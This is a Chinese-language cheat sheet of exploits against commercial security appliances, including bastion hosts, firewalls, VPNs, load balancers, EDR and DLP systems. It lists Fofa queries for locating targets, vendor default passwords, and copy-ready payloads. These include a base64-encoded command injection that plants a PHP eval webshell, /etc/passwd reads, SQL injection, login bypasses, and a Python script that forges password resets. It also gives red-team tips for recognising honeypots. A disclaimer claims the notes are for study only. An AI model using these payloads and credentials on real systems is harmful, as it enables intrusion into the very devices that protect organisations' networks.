学习笔记-常见安全设备渗透方法

SecDevice - Exploits

---

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

---

大纲

• 身份与访问控制

  • 堡垒机
  • IMC

• 网络检测与响应

  • 蜜罐
  • IDS
  • 防火墙
  • WAF
  • 网关
  • 负载均衡
  • VPN

• 终端响应与检测

  • 杀软
  • EDR
  • 数据防泄漏系统

---

身份与访问控制

堡垒机

齐治堡垒机

Fofa: app="齐治科技-堡垒机"

• 默认口令

  • shterm/shterm

• 齐治堡垒机 ShtermClient-2.1.1 命令执行漏洞

  • 齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593)分析

    http://10.20.10.11/listener/cluster_manage.php
    https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}
    /var/www/shterm/resources/qrcode/lbj77.php  密码10086
    

• CNVD-2019-20835 齐治堡垒机前台远程命令执行漏洞

  • 齐治堡垒机前台远程命令执行漏洞(CNVD-2019-20835)分析

• CNVD-2019-17294 齐治堡垒机后台存在命令执行漏洞

  • 齐治堡垒机后台存在命令执行漏洞(CNVD-2019-17294)分析

• 远程代码执行

  • POC | Payload | exp

    POST /shterm/listener/tui_update.php
     
    a=["t';import os;os.popen('whoami')#"]
    

• 任意用户登录漏洞

  • POC | Payload | exp

    /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
    

H3C SecParh

Fofa: app="H3C-SecPath-运维审计系统" && body="2018"

• get_detail_view.php 任意用户登录漏洞
  • POC | Payload | exp

    /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
    

teleport 开源堡垒机

fofa: app="TELEPORT堡垒机"

• 相关文章

  • teleport堡垒机审计学习
  • 某开源堡垒机历史漏洞分析

• 任意用户登录漏洞

  • POC | Payload | exp
    • teleport 堡垒机任意用户登录漏洞
    • 针对某堡垒机漏洞分析(一)

• 后台文件读取

  • POC | Payload | exp

    /audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0
    

IMC

H3C IMC智能管理中心

• 远程代码执行
  • H3C IMC智能管理中心漏洞复现

---

网络检测与响应

蜜罐

相关文章

• 【格物实验室】浅谈物联网蜜罐识别方法
• 红队遇蜜罐 莫慌
• 浅谈Mysql蜜罐识别
• 浅析开源蜜罐识别与全网测绘
• 蜜罐建设的一些思考

相关工具

• BeichenDream/WhetherMysqlSham - 检测目标 Mysql 数据库是不是蜜罐,获取目标数据库详细信息
• Monyer/antiHoneypot - 一个拦截蜜罐 XSSI 的 Chrome 扩展
• NS-Sp4ce/MoAn_Honey_Pot_Urls - X安蜜罐用的一些存在JSonp劫持的API

从蓝队溯源角度出发

• 分析样本
  • PC 名称
  • 语言
  • 常用函数、方法
  • 注释习惯、变量名习惯
• 前端漏洞反制
  • 浏览器记录、书签、cookie 等
  • 验证码、手机号、邮箱
  • 攻击时间段
• 后渗透反制
  • 钓鱼文件
  • ntlm中继
  • Rogue MySql Server

从红队角度出发

• 前台
  • 不支持正常浏览器，仅老版 IE
  • 仅支持老版本 flash
  • 不正常的 JS 文件，js 混淆
  • 仅 json 文件, 内含指纹
  • XSS、JSONP
  • 大量网络请求
  • 同站同 CMS 不同页面不同时间、CMS 版本
  • 任意口令登录?
  • 要求实名认证、或手机号注册
• 后渗透
  • 第二次登录后发现 history 记录全部清空
  • 开放了大量端口
  • docker 容器且无正常业务数据
  • 例如 cat /proc/meminfo 这个命令无论执行多少次得到的内容都是不变的，而这真实的系统中是不可能的。

IDS

相关文章

• IDS逃避技术和对策
• 网络层绕过IDS/IPS的一些探索

绿盟 UTS 综合威胁探针

• 管理员任意登录
  • POC | Payload | exp
    • 绿盟UTS综合威胁探针管理员任意登录
    • 【干货】绿盟UTS综合威胁探针管理员任意登录

---

防火墙

Cisco ASA

• CVE-2018-0296 Cisco ASA Directory Traversal

  • POC | Payload | exp
    • yassineaboukir/CVE-2018-0296

• CVE-2020-3452

  • POC | Payload | exp

    /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
    

网康下一代防火墙

fofa: app="网康科技-下一代防火墙"

• 网康下一代防火墙 RCE
  • POC | Payload | exp

    POST /directdata/direct/router HTTP/1.1
     
    {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
    

    访问：https://x.x.x.x/test_test.txt
    

启明星辰 天清汉马USG防火墙

• 弱口令

  账号：useradmin
  密码：venus.user
  

• 逻辑缺陷漏洞

  登陆后,后台可直接修改任意用户权限
  

佑友防火墙

• 默认账号密码

  User: admin
  Pass: hicomadmin
  

• 后台命令执行漏洞

  系统管理 --> 维护工具 --> Ping
  127.0.0.1|cat /etc/passwd
  

zeroshell

• rce
  • POC | Payload | exp
    • ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)

---

WAF

Sophos XG

• CVE-2020-12271 && CVE-2020-15504
  • 相关文章
    • Sophos XG - A Tale of the Unfortunate Re-engineering of an N-Day and the Lucky Find of a 0-Day

绿盟 waf 封禁绕过s

• XFF 伪造字段地址为 127.0.0.1，导致 waf 上看不见攻击者地址

---

网关

上海格尔安全认证网关管理系统

• 上海格尔安全认证网关管理系统命令执行漏洞大礼包
• 上海格尔软件安全认证网关命令执行漏洞(无需登录)
• 上海格尔软件安全认证网关命令执行漏洞(可批量getshell)

网康 NS-ASG 安全网关

Fofa : 网康 NS-ASG 安全网关

• 任意文件读取漏洞
  • POC | Payload | exp

    /admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
    

---

负载均衡

Citrix ADC

• 默认口令

  nsroot/nsroot
  

• CVE-2019-19781 Citrix Gateway/ADC 远程代码执行漏洞

  • 相关文章

    • Citrix Gateway/ADC 远程代码执行漏洞分析

  • POC | Payload | exp

    • trustedsec/cve-2019-19781
    • jas502n/CVE-2019-19781

F5 BIG-IP

• CVE-2020-5902 F5 BIG-IP 远程代码执行漏洞

  • 相关文章

    • CVE-2020-5902——关于;号绕过认证技巧总结
    • F5 BIG-IP Remote Code Execution Exploit - CVE-2020-5902 | Critical Start

  • POC | Payload | exp

    • jas502n/CVE-2020-5902
    • theLSA/f5-bigip-rce-cve-2020-5902

• CVE-2021-22986 F5 BIG-IP RCE

  • 相关文章

    • CVE-2021-22986：BIG-IP/BIG-IQ未授权RCE
    • F5 BIG-IP CVE-2021-22986 验证及利用

  • POC | Payload | exp

    • h4x0r-dz/RCE-Exploit-in-BIG-IP
    • Al1ex/CVE-2021-22986

• CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞

  • 镜像下载

    • https://downloads.f5.com/esd/ecc.sv?sw=BIG-IP&pro=big-ip_v15.x&ver=15.1.5&container=15.1.5.1_Virtual-Edition

  • 相关文章

    • CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现
    • F5 BIG-IP本地环境搭建以及CVE-2022-1388复现

天融信 Top-app LB

• SQL注入漏洞

  • POC | Payload | exp
    • 天融信Top-app LB负载均衡SQL注入漏洞

      POST /acc/clsf/report/datasource.php HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
       
      t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22-- &o=r_Speed&gid=0&lmt=10&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=
      

• 未授权

  • POC | Payload | exp
    • 天融信负载均衡TopApp-LB系统无需密码直接登录

      登录框
      ; ping xxx.dnslog.info; echo
      

• RCE

  • POC | Payload | exp
    • 天融信TopApp-LB负载均衡命令执行漏洞大量设备可被通杀

      用户名随意  密码：;id
      

---

VPN

Fortigate SSL VPN

• CVE-2018-13379 Fortigate SSL VPN 密码读取
  • milo2012/CVE-2018-13379
• CVE-2018-13382 Fortigate SSL VPN 任意密码重置
  • milo2012/CVE-2018-13382

Palo_Alto SSL VPN

• CVE-2019-1579 Palo Alto GlobalProtect 远程代码执行漏洞

  • 相关文章

    • Orange: Attacking SSL VPN - Part 1: PreAuth RCE on Palo Alto GlobalProtect, with Uber as Case Study!
    • Palo Alto GlobalProtect上的PreAuth RCE

  • POC | Payload | exp

    • securifera/CVE-2019-1579

Pulse_Secure SSL VPN

• CVE-2019-11510 Pulse Secure SSL VPN 任意文件读取漏洞

  • 相关文章

    • Pulse Secure 任意文件读取(CVE-2019-11510)漏洞

  • POC | Payload | exp

    • projectzeroindia/CVE-2019-11510

• CVE-2019-11539 Pulse Secure SSL VPN 远程代码执行漏洞

  • 0xDezzy/CVE-2019-11539

深信服 VPN

• 常见密码

  admin/sangfor@123
  sangfor/sangfor
  test/test
  test1/123456b
  

• 口令爆破

  • POC | Payload | exp
    • https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=20633

      用户登录，若多次尝试登录失败会要求输入验证码，若输入错误的验证码，会提示“校验码错误或校验码已过期”；修改登录请求的数据包，清空cookie和验证码字段的值即可绕过验证码，此时提示“用户名或密码错误”。
      /por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd=
      

• 短信绕过

  • POC | Payload | exp

    POST https://路径/por/changetelnum.csp?apiversion=1
     
    newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1
    

• 任意密码重置

  • POC | Payload | exp

    某VPN加密算法使用了默认的key,攻击者构利用key构造重置密码数据包从而修改任意用户的密码
    利用:需要登录账号
     
    M7.6.6R1版本key为20181118
     
    M7.6.1key为20100720
     
    POST /por/changepwd.csp
     
    sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN(脚本计算后结果)
    

    from Crypto.Cipher import ARC4
    from binascii import a2b_hex
     
    def myRC4(data, key):
        rc41= ARC4.new(key)
        encrypted =rc41.encrypt(data)
        return encrypted. encode('hex')
     
    def rc4_decrpt_hex(data, key):
        rc41= ARC4. new(key)
        return rc41. decrypt(a2b_hex(data))
     
    key= '20100720'
    data = r',username-TARGET_USERNAME, ip-127.0.0.1,grpid-1, pripsw-suiyi , newpsw=TARGET PASSWORD,'
    print myRC4(data, key)
    

• RCE

  • 影响版本

    • SSLM7.6.6(20181120)
    • SSLM7.6.6R1(20181225)

  • 相关文章

    • 深信服vpn逆向(挖洞)

  • POC | Payload | exp

    https://x.com/por/checkurl.csp?url=http://127.0.0.1;sleep${IFS}5;&retry=0&timeout=1
    

锐捷 SSL VPN

• 锐捷 SSL VPN 越权访问漏洞
  • FOFA: icon_hash="884334722" || title="Ruijie SSL VPN"
  • 相关文章
    • 锐捷SSL VPN 越权访问漏洞
  • POC | Payload | exp

    GET /cgi-bin/main.cgi?oper=getrsc HTTP/1.1
    Cookie: UserName=admin; SessionId=1; FirstVist=1; Skin=1; tunnel=1
    

    UserName 参数为已知用户名

威胁感知

Sophos UTM

• CVE-2020-25223-Sophos UTM WebAdmin 远程命令执行漏洞
  • 相关文章
    • CVE-2020-25223-Sophos UTM WebAdmin 远程命令执行漏洞分析

---

终端响应与检测

相关文章

• 绕过集中管控类安全软件小技巧

杀软

利用杀毒软件删除任意文件

• 相关文章
  • Exploiting (Almost) Every Antivirus Software
    • 利用杀毒软件删除任意文件

白名单信任文件

• 相关文章
  • 通过信任文件绕过火绒

EDR

深信服 EDR

• 相关文章

  • 深信服DER RCE 复现

• 2020.08命令执行

  • 相关文章
    • 深信服终端检测响应平台 EDR 代码审计
  • POC | Payload | exp
    • A2gel/sangfor-edr-exploit

• 2020.09命令执行

  • POC | Payload | exp

    POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
    {"params":"w=123\"'1234123'\"|命令"}
    

• 后台任意用户登陆

  • POC | Payload | exp

    xxx.xxx.xxx.xxx/ui/login.php?user=admin
    

360天擎

Fofa: title="360天擎"

• 前台SQL注入

  • POC | Payload | exp

    /api/dp/rptsvcsyncpoint?ccid=1
    

• 数据库信息泄露漏洞

  • POC | Payload | exp

    http://x.x.x.x/api/dbstat/gettablessize
    

金山 V8 终端安全系统

Fofa: title="在线安装-V8+终端安全系统Web控制台"

• 任意文件读取漏洞

  • POC | Payload | exp

    /htmltopdf/downfile.php?filename=downfile.php
    

• pdf_maker.php 命令执行漏洞

  • 相关文章

    • 某终端安全系统Nday分析+复现

  • POC | Payload | exp

    POST /inter/pdf_maker.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
     
    url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx
    

---

数据防泄漏系统

天融信数据防泄漏系统

• 越权修改管理员密码

  无需登录权限,由于修改密码处未校验原密码,且 /?module=auth_user&action=mod_edit_pwd 接口未授权访问,造成直接修改任意用户密码。 默认 superman 账户 uid 为 1。
   
  POST /?module=auth_user&action=mod_edit_pwd
   
  Cookie: username=superman;
  uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1
  

点击关注，共同学习！安全狗的自我修养

github haidragon

https://github.com/haidragon